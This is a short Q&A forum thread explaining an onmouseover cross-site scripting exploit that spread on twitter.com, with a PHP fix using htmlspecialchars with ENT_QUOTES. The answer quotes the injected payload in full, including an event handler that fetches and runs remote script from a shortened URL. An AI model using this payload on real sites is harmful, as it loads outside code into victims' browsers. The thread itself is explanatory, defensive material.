Today's XSS onmouseover exploit on twitter.com

Question

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:

http://t.co/@\"style=\"fon         


        

Answer 1

Yes this is XSS, it is attacking a javascript event handler. What is cool about this XSS is that it doesn't require <> to exploit. The injected string is: size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')".

The size::999999999999px makes it very large and there for more likly that someone will mouse over it. The real problem is the onmouseover= event handler.

To prevent this in PHP you need to convert quote marks into their html entities: $var=htmlspecialchars($var,ENT_QUOTES);

This is because HTML you cannot escape quotes like sql: \'